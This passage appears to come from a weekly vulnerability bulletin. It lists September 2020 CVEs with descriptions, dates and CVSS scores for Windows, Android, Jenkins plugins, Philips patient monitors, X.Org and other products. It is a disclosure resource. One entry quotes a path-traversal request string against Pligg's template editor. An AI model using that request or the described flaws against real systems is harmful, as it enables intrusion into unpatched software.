    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1169. 2020-09-11 6.8 CVE-2020-1303
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations, aka 'Windows Language Pack Installer Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-1122
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows RSoP Service Application improperly handles memory. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows RSoP Service Application Elevation of Privilege Vulnerability'. 2020-09-11 4.6 CVE-2020-0648
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory. To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Microsoft Store Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1146. 2020-09-11 4.6 CVE-2020-0766
    N/A
    microsoft -- windows_10 A spoofing vulnerability exists when Active Directory Federation Services (ADFS) improperly handles multi-factor authentication requests. To exploit this vulnerability, an attacker could send a specially crafted authentication request, aka 'ADFS Spoofing Vulnerability'. 2020-09-11 4 CVE-2020-0837
    N/A
    microsoft -- windows_server_2008 An information disclosure vulnerability exists when Active Directory integrated DNS (ADIDNS) mishandles objects in memory, aka 'Active Directory Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0856. 2020-09-11 4 CVE-2020-0664
    N/A
    microsoft -- windows_server_2008 A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries, aka 'Windows DNS Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-0836. 2020-09-11 4 CVE-2020-1228
    N/A
    microsoft -- windows_server_2008 A remote code execution vulnerability exists when Active Directory integrated DNS (ADIDNS) mishandles objects in memory, aka 'Active Directory Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0761. 2020-09-11 6.5 CVE-2020-0718
    N/A
    microsoft -- windows_server_2008 A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries, aka 'Windows DNS Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-1228. 2020-09-11 5 CVE-2020-0836
    N/A
    microsoft -- windows_server_2008 An information disclosure vulnerability exists when Active Directory integrated DNS (ADIDNS) mishandles objects in memory, aka 'Active Directory Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0664. 2020-09-11 4 CVE-2020-0856
    N/A
    microsoft -- windows_server_2008 A remote code execution vulnerability exists when Active Directory integrated DNS (ADIDNS) mishandles objects in memory, aka 'Active Directory Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0718. 2020-09-11 6.5 CVE-2020-0761
    N/A
    microsoft -- xamarin.forms A spoofing vulnerability manifests in Microsoft Xamarin.Forms due to the default settings on Android WebView version prior to 83.0.4103.106, aka 'Xamarin.Forms Spoofing Vulnerability'. 2020-09-11 6.8 CVE-2020-16873
    N/A
    mikrotik -- routeros An array index error in MikroTik RouterOS 6.41.3 through 6.46.5, and 7.x through 7.0 Beta5, allows an unauthenticated remote attacker to crash the SMB server via modified setup-request packets, aka SUP-12964. 2020-09-14 5 CVE-2020-11881
    MISC
    MISC
    perl -- dbi An issue was discovered in the DBI module before 1.632 for Perl. Using many arguments to methods for Callbacks may lead to memory corruption. 2020-09-11 5 CVE-2013-7490
    MISC
    MISC
    MISC
    UBUNTU
    perl -- dbi An issue was discovered in the DBI module before 1.628 for Perl. Stack corruption occurs when a user-defined function requires a non-trivial amount of memory and the Perl stack gets reallocated. 2020-09-11 5 CVE-2013-7491
    MISC
    MISC
    MISC
    perl -- dbi An issue was discovered in the DBI module before 1.632 for Perl. DBD::File drivers can open files from folders other than those specifically passed via the f_dir attribute. 2020-09-11 5 CVE-2014-10401
    MISC
    MISC
    MISC
    UBUNTU
    perl -- dbi An issue was discovered in the DBI module before 1.643 for Perl. The hv_fetch() documentation requires checking for NULL and the code does that. But, shortly thereafter, it calls SvOK(profile), causing a NULL pointer dereference. 2020-09-17 5 CVE-2019-20919
    MISC
    MISC
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource. The application on the surveillance station operates in kiosk mode, which is vulnerable to local breakouts that could allow an attacker with physical access to escape the restricted environment with limited privileges. 2020-09-11 4.6 CVE-2020-16212
    MISC
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The software does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a compromised certificate. 2020-09-11 5.2 CVE-2020-16228
    MISC
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. When an actor claims to have a given identity, the software does not prove or insufficiently proves the claim is correct. 2020-09-11 5.8 CVE-2020-16222
    MISC
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The software saves user-provided information into a comma-separated value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by spreadsheet software. 2020-09-11 5.8 CVE-2020-16214
    MISC
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The product receives input or data but does not validate or incorrectly validates that the input has the properties required to process the data safely and correctly, which can induce a denial-of-service condition through a system restart. 2020-09-11 6.1 CVE-2020-16216
    MISC
    pligg_project -- pligg Pligg 2.0.3 allows remote authenticated users to execute arbitrary commands because the template editor can edit any file, as demonstrated by an admin/admin_editor.php the_file=..%2Findex.php&open=Open request. 2020-09-13 6.5 CVE-2020-25287
    MISC
    primekey -- ejbca An issue was discovered in PrimeKey EJBCA 6.x and 7.x before 7.4.1. When using a client certificate to enroll over the EST protocol, no revocation check is performed on that certificate. This vulnerability can only affect a system that has EST configured, uses client certificates to authenticate enrollment, and has had such a certificate revoked. This certificate needs to belong to a role that is authorized to enroll new end entities. (To completely mitigate this problem prior to upgrade, remove any revoked client certificates from their respective roles.) 2020-09-11 6.8 CVE-2020-25276
    MISC
    qnap -- helpdesk The vulnerability has been reported to affect earlier versions of Helpdesk. If exploited, this information exposure vulnerability could disclose sensitive information. QNAP has already fixed the issue in Helpdesk 3.0.3 and later. 2020-09-11 4 CVE-2018-19947
    MISC
    qnap -- helpdesk The vulnerability has been reported to affect earlier versions of Helpdesk. If exploited, this cross-site request forgery (CSRF) vulnerability could allow attackers to force NAS users to execute unintentional actions through a web application. QNAP has already fixed the issue in Helpdesk 3.0.3 and later. 2020-09-11 4.3 CVE-2018-19948
    MISC
    qnap -- helpdesk The vulnerability has been reported to affect earlier versions of Helpdesk. If exploited, this improper certificate validation vulnerability could allow an attacker to spoof a trusted entity by interfering in the communication path between the host and client. QNAP has already fixed the issue in Helpdesk 3.0.3 and later. 2020-09-11 4.3 CVE-2018-19946
    MISC
    rails -- action_view In Action View before versions 5.2.4.4 and 6.0.3.3 there is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks. When an HTML-unsafe string is passed as the default for a missing translation key named html or ending in _html, the default string is incorrectly marked as HTML-safe and not escaped. This is patched in versions 6.0.3.3 and 5.2.4.4. A workaround without upgrading is proposed in the source advisory. 2020-09-11 4.3 CVE-2020-15169
    CONFIRM
    recall-products_project -- recall-products Wordpress Plugin Store / Mike Rooijackers Recall Products V0.8 fails to sanitize input from the 'Manufacturer[]' parameter which allows an authenticated attacker to inject a malicious SQL query. 2020-09-14 6.5 CVE-2020-25379
    MISC
    rukovoditel -- rukovoditel Rukovoditel Project Management app 2.6 is affected by: Cross Site Scripting (XSS). An attacker can add JavaScript code to the filename. 2020-09-14 4.3 CVE-2020-21732
    MISC
    MISC
    MISC
    sagemcom -- f\@st_3686_firmware Sagemcom F@ST3686 v1.0 HUN 3.97.0 has XSS via RgDiagnostics.asp, RgDdns.asp, RgFirewallEL.asp, RgVpnL2tpPptp.asp. 2020-09-14 4.3 CVE-2020-21733
    MISC
    MISC
    MISC
    MISC
    spiceworks -- spiceworks Spiceworks Version <= 7.5.00107 is affected by CSRF which can lead to privilege escalation via "/settings/v1/users" function. 2020-09-15 6.8 CVE-2020-23451
    MISC
    MISC
    taoensso -- nippy A deserialization flaw is present in Taoensso Nippy before 2.14.2. In some circumstances, it is possible for an attacker to create a malicious payload that, when deserialized, will allow arbitrary code to be executed. This occurs because there is automatic use of the Java Serializable interface. 2020-09-11 6.8 CVE-2020-24164
    MISC
    vtenext -- vtenext A file upload vulnerability in vtecrm vtenext 19 CE allows authenticated users to upload files with a .pht extension, resulting in remote code execution. 2020-09-14 6.5 CVE-2020-10228
    MISC
    MISC
    MISC
    vtenext -- vtenext A cross-site scripting (XSS) vulnerability in the messages module of vtecrm vtenext 19 CE allows attackers to inject arbitrary JavaScript code via the From field of an email. 2020-09-14 4.3 CVE-2020-10227
    MISC
    MISC
    MISC
    vtenext -- vtenext A CSRF issue in vtecrm vtenext 19 CE allows attackers to carry out unwanted actions on an administrator's behalf, such as uploading files, adding users, and deleting accounts. 2020-09-14 6.8 CVE-2020-10229
    MISC
    MISC
    MISC
    wibu -- codemeter An attacker could send a specially crafted packet that could have CodeMeter (All versions prior to 7.10) send back packets containing data from the heap. 2020-09-16 5 CVE-2020-16233
    MISC
    wordpress -- wordpress In wp-includes/comment-template.php in WordPress before 5.4.2, comments from a post or page could sometimes be seen in the latest comments even if the post or page was not public. 2020-09-13 5 CVE-2020-25286
    MISC
    MISC
    x.org -- libx11 An integer overflow vulnerability leading to a double-free was found in libX11. This flaw allows a local privileged attacker to cause an application compiled with libX11 to crash, or in some cases, result in arbitrary code execution. The highest threat from this flaw is to confidentiality, integrity as well as system availability. 2020-09-11 4.6 CVE-2020-14363
    CONFIRM
    MISC
    UBUNTU
    x.org -- xorg-server A flaw was found in xorg-x11-server before 1.20.9. An integer underflow in the X input extension protocol decoding in the X server may lead to arbitrary access of memory contents. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 2020-09-15 4.6 CVE-2020-14346
    MISC
    MISC
    UBUNTU
    x.org -- xorg-server A flaw was found in X.Org Server before xorg-x11-server 1.20.9. An Integer underflow leading to heap-buffer overflow may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 2020-09-15 4.6 CVE-2020-14362
    MISC
    MISC
    UBUNTU
    x.org -- xorg-server A flaw was found in X.Org Server before xorg-x11-server 1.20.9. An Integer underflow leading to heap-buffer overflow may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 2020-09-15 4.6 CVE-2020-14361
    MISC
    MISC
    UBUNTU
    zeromq -- libzmq In ZeroMQ before version 4.3.3, there is a denial-of-service vulnerability. Users with TCP transport public endpoints, even with CURVE/ZAP enabled, are impacted. If a raw TCP socket is opened and connected to an endpoint that is fully configured with CURVE/ZAP, legitimate clients will not be able to exchange any message. Handshakes complete successfully, and messages are delivered to the library, but the server application never receives them. This is patched in version 4.3.3. 2020-09-11 5 CVE-2020-15166
    MISC
    MISC
    CONFIRM
    GENTOO

    Low Vulnerabilities

    Primary Vendor -- Product Description Published CVSS Score Source & Patch Info
    avast -- secureline_vpn The VPN service in AVAST SecureLine before 5.6.4982.470 allows local users to write to arbitrary files via an Object Manager symbolic link from the log directory (which has weak permissions). 2020-09-13 2.1 CVE-2020-25289
    MISC
    canonical -- ubuntu-ui-toolkit On desktop, Ubuntu UI Toolkit's StateSaver would serialise data on tmp/ files which an attacker could use to expose potentially sensitive data. StateSaver would also open files without the O_EXCL flag. An attacker could exploit this to launch a symlink attack, though this is partially mitigated by symlink and hardlink restrictions in Ubuntu. Fixed in 1.1.1188+14.10.20140813.4-0ubuntu1. 2020-09-11 2.1 CVE-2014-1420
    UBUNTU
    UBUNTU
    elementor -- elementor_page_builder A stored XSS vulnerability exists in the Custom Link Attributes control Affect function in Elementor Page Builder 2.9.2 and earlier versions. It is caused by inadequate filtering on the link custom attributes. 2020-09-16 3.5 CVE-2020-20406
    MISC
    elkarbackup -- elkarbackup A Persistent Cross-site Scripting vulnerability is found in ElkarBackup v1.3.3, where an attacker can steal the user session cookie using this vulnerability present on Policies >> action >> Name Parameter 2020-09-15 3.5 CVE-2020-24924
    MISC
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was vulnerable to a stored XSS on the standalone vulnerability page. 2020-09-14 3.5 CVE-2020-13301
    CONFIRM
    MISC
    MISC
    google -- android In Settings, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-151645695 2020-09-18 2.1 CVE-2020-0304
    MISC
    google -- android In NFC, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-139188779 2020-09-18 2.1 CVE-2020-0349
    MISC
    google -- android In NFC, there is a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-145079309 2020-09-18 2.1 CVE-2020-0325
    MISC
    google -- android In Settings, there is a possible permissions bypass. This could lead to local information disclosure of the device's IMEI with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-147309310 2020-09-18 2.1 CVE-2020-0331
    MISC
    google -- android In Telephony, there is a missing permission check. This could lead to local information disclosure of radio data with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-154934919 2020-09-18 2.1 CVE-2020-0316
    MISC
    google -- android In the Accessibility service, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-154913130 2020-09-18 2.1 CVE-2020-0263
    MISC
    google -- android In Zen Mode, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-155642026 2020-09-18 2.1 CVE-2020-0315
    MISC
    google -- android In NotificationManagerService, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-154917989 2020-09-18 2.1 CVE-2020-0313
    MISC
    google -- android In InputManagerService, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-153878642 2020-09-18 2.1 CVE-2020-0311
    MISC
    google -- android In Settings, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-153356468 2020-09-18 2.1 CVE-2020-0310
    MISC
    google -- android In Settings, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-151645867 2020-09-18 2.1 CVE-2020-0307
    MISC
    google -- android In Settings, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-151646375 2020-09-18 2.1 CVE-2020-0302
    MISC
    google -- android In libhwbinder, there is a possible information disclosure due to uninitialized data. This could lead to local information disclosure with System execution privileges required. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-130166487 2020-09-18 2.1 CVE-2020-0272
    MISC
    google -- android In Telecom, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-155650969 2020-09-18 2.1 CVE-2020-0295
    MISC
    google -- android In core networking, there is a missing permission check. This could lead to local information disclosure of app network usage with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-129151407 2020-09-18 2.1 CVE-2020-0327
    MISC
    google -- android In Telephony, there are possible leaks of sensitive data due to missing permission checks. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-150155839 2020-09-18 2.1 CVE-2020-0265
    MISC
    google -- android In Android Auto Settings, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-151645626 2020-09-18 2.1 CVE-2020-0269
    MISC
    google -- android In Bluetooth, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges and a compromised Firmware needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-146032016 2020-09-18 2.1 CVE-2020-0291
    MISC
    google -- android In Telephony, there is a possible permission bypass due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-156253586 2020-09-18 2.1 CVE-2020-0276
    MISC
    google -- android In Telephony, there is a possible permission bypass due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-156253784 2020-09-18 2.1 CVE-2020-0284
    MISC
    google -- android In Telephony, there is a possible permission bypass due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-156253479 2020-09-18 2.1 CVE-2020-0285
    MISC
    google -- android In the wallpaper manager, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-154915372 2020-09-18 2.1 CVE-2020-0294
    MISC
    google -- android In Bluetooth, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges and a compromised Firmware needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android ID: A-110107252 2020-09-18 2.1 CVE-2020-0292
    MISC
    huawei -- bla-a09_firmware Huawei smartphones BLA-A09 versions 8.0.0.123(C212),versions earlier than 8.0.0.123(C567),versions earlier than 8.0.0.123(C797);BLA-TL00B versions earlier than 8.1.0.326(C01);Berkeley-L09 versions earlier than 8.0.0.163(C10),versions earlier than 8.0.0.163(C432),Versions earlier than 8.0.0.163(C636),Versions earlier than 8.0.0.172(C10);Duke-L09 versions Duke-L09C10B187, versions Duke-L09C432B189, versions Duke-L09C636B189;HUAWEI P20 versions earlier than 8.0.1.16(C00);HUAWEI P20 Pro versions earlier than 8.1.0.152(C00);Jimmy-AL00A versions earlier than Jimmy-AL00AC00B172;LON-L29D versions LON-L29DC721B192;NEO-AL00D versions earlier than 8.1.0.172(C786);Stanford-AL00 versions Stanford-AL00C00B123;Toronto-AL00 versions earlier than Toronto-AL00AC00B225;Toronto-AL00A versions earlier than Toronto-AL00AC00B225;Toronto-TL10 versions earlier than Toronto-TL10C01B225 have an information vulnerability. A module has a design error that is lack of control of input. Attackers can exploit this vulnerab 2020-09-11 2.1 CVE-2020-9239
    MISC
    ibm -- business_automation_workflow IBM Business Automation Workflow C.D.0 and IBM Business Process Manager 8.0, 8.5, and 8.6 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-ForceID: 182714. 2020-09-15 3.5 CVE-2020-4530
    XF
    CONFIRM
    ibm -- tivoli_business_service_manager IBM Tivoli Business Service Manager 6.2.0.0 - 6.2.0.2 IF 1 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 178247. 2020-09-15 2.1 CVE-2020-4344
    XF
    CONFIRM
    jenkins -- android_lint Jenkins Android Lint Plugin 2.6 and earlier does not escape the annotation message in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to the plugin's post-build step. 2020-09-16 3.5 CVE-2020-2262
    MLIST
    CONFIRM
    jenkins -- blue_ocean Jenkins Blue Ocean Plugin 1.23.2 and earlier provides an undocumented feature flag that, when enabled, allows an attacker with Job/Configure or Job/Create permission to read arbitrary files on the Jenkins controller file system. 2020-09-16 3.5 CVE-2020-2254
    MLIST
    CONFIRM
    jenkins -- chosen-views-tabbar Jenkins chosen-views-tabbar Plugin 1.2 and earlier does not escape view names in the dropdown to select views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with the ability to configure views. 2020-09-16 3.5 CVE-2020-2269
    MLIST
    CONFIRM
    jenkins -- clearcase_release Jenkins ClearCase Release Plugin 0.3 and earlier does not escape the composite baseline in badge tooltip, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-09-16 3.5 CVE-2020-2270
    MLIST
    CONFIRM
    jenkins -- computer_queue Jenkins computer-queue-plugin Plugin 1.5 and earlier does not escape the agent name in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure permission. 2020-09-16 3.5 CVE-2020-2259
    MLIST
    CONFIRM
    jenkins -- coverage\/complexity_scatter_plot Jenkins Coverage/Complexity Scatter Plot Plugin 1.1.1 and earlier does not escape the method information in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to the plugin's post-build step. 2020-09-16 3.5 CVE-2020-2265
    MLIST
    CONFIRM
    jenkins -- custom_job_icon Jenkins Custom Job Icon Plugin 0.2 and earlier does not escape the job descriptions in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-09-16 3.5 CVE-2020-2264
    MLIST
    CONFIRM
    jenkins -- description_column Jenkins Description Column Plugin 1.3 and earlier does not escape the job description in the column tooltip, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-09-16 3.5 CVE-2020-2266
    MLIST
    CONFIRM
    jenkins -- elastest Jenkins ElasTest Plugin 1.2.1 and earlier stores its server password unencrypted in its global configuration file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system. 2020-09-16 2.1 CVE-2020-2274
    MLIST
    CONFIRM
    jenkins -- locked_files_report Jenkins Locked Files Report Plugin 1.6 and earlier does not escape locked files' names in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-09-16 3.5 CVE-2020-2271
    MLIST
    CONFIRM
    jenkins -- pipeline_maven_integration Jenkins Pipeline Maven Integration Plugin 3.9.2 and earlier does not escape the upstream job's display name shown as part of a build cause, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-09-16 3.5 CVE-2020-2256
    MLIST
    CONFIRM
    jenkins -- radiator_view Jenkins Radiator View Plugin 1.29 and earlier does not escape the full name of the jobs in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-09-16 3.5 CVE-2020-2263
    MLIST
    CONFIRM
    jenkins -- validating_string_parameter Jenkins Validating String Parameter Plugin 2.4 and earlier does not escape various user-controlled fields, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission. 2020-09-16 3.5 CVE-2020-2257
    MLIST
    CONFIRM
    kaiostech -- kaios An issue was discovered in KaiOS 1.0, 2.5, and 2.5.1. The pre-installed Radio application is vulnerable to HTML and JavaScript injection attacks. A local attacker can inject arbitrary HTML into the Radio application. At a bare minimum, this allows an attacker to take control over the Radio application's UI (e.g., display a malicious prompt to the user asking them to re-enter credentials such as their KaiOS credentials to continue using the application) and also allows an attacker to abuse any of the privileges available to the mobile application. 2020-09-14 1.9 CVE-2019-14759
    MISC
    kaiostech -- kaios An issue was discovered in KaiOS 2.5. The pre-installed Recorder application is vulnerable to HTML and JavaScript injection attacks. A local attacker can inject arbitrary HTML into the Recorder application. At a bare minimum, this allows an attacker to take control over the Recorder application's UI (e.g., display a malicious prompt to the user asking them to re-enter credentials such as their KaiOS credentials to continue using the application) and also allows an attacker to abuse any of the privileges available to the mobile application. 2020-09-14 1.9 CVE-2019-14760
    MISC
    MISC
    kaiostech -- kaios An issue was discovered in KaiOS 2.5. The pre-installed Note application is vulnerable to HTML and JavaScript injection attacks. A local attacker can inject arbitrary HTML into the Note application. At a bare minimum, this allows an attacker to take control over the Note application's UI (e.g., display a malicious prompt to the user asking them to re-enter credentials such as their KaiOS credentials to continue using the application) and also allows an attacker to abuse any of the privileges available to the mobile application. 2020-09-14 1.9 CVE-2019-14761
    MISC
    MISC
    linux -- linux_kernel The rbd block device driver in drivers/block/rbd.c in the Linux kernel through 5.8.9 used incomplete permission checking for access to rbd devices, which could be leveraged by local attackers to map or unmap rbd block devices, aka CID-f44d04e696fe. 2020-09-13 2.1 CVE-2020-25284
    MISC
    MISC
    mcafee -- web_gateway Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows an authenticated user interface user to access protected dashboard data via improper access control in the user interface. 2020-09-16 2.7 CVE-2020-7297
    MISC
    mcafee -- web_gateway Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows an authenticated user interface user to access protected configuration files via improper access control in the user interface. 2020-09-15 2.7 CVE-2020-7296
    CONFIRM
    microsoft -- onedrive An elevation of privilege vulnerability exists when the OneDrive for Windows Desktop application improperly handles symbolic links, aka 'OneDrive for Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16851, CVE-2020-16853. 2020-09-11 3.6 CVE-2020-16852
    N/A
    microsoft -- onedrive An elevation of privilege vulnerability exists when the OneDrive for Windows Desktop application improperly handles symbolic links, aka 'OneDrive for Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16851, CVE-2020-16852. 2020-09-11 3.6 CVE-2020-16853
    N/A
    microsoft -- onedrive An elevation of privilege vulnerability exists when the OneDrive for Windows Desktop application improperly handles symbolic links, aka 'OneDrive for Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16852, CVE-2020-16853. 2020-09-11 3.6 CVE-2020-16851
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Information Disclosure Vulnerability'. 2020-09-11 2.1 CVE-2020-0914
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the win32k component improperly provides kernel information, aka 'Win32k Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0941. 2020-09-11 2.1 CVE-2020-1250
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the win32k component improperly provides kernel information, aka 'Win32k Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1250. 2020-09-11 2.1 CVE-2020-0941
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions, aka 'Windows Mobile Device Management Diagnostics Information Disclosure Vulnerability'. 2020-09-11 2.1 CVE-2020-0989
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0928, CVE-2020-1589, CVE-2020-1592, CVE-2020-16854. 2020-09-11 2.1 CVE-2020-1033
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory, aka 'Microsoft Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0921. 2020-09-11 2.1 CVE-2020-1083
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when StartTileData.dll improperly handles objects in memory, aka 'Windows Information Disclosure Vulnerability'. 2020-09-11 2.1 CVE-2020-1119
    N/A
    microsoft -- windows_10 A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system. To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application. The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to handle these requests., aka 'Windows Hyper-V Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-0890. 2020-09-11 2.1 CVE-2020-0904
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. To exploit this vulnerability, an authenticated attacker could run a specially crafted application, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0928, CVE-2020-1033, CVE-2020-1589, CVE-2020-16854. 2020-09-11 2.1 CVE-2020-1592
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1033, CVE-2020-1589, CVE-2020-1592, CVE-2020-16854. 2020-09-11 2.1 CVE-2020-0928
    N/A
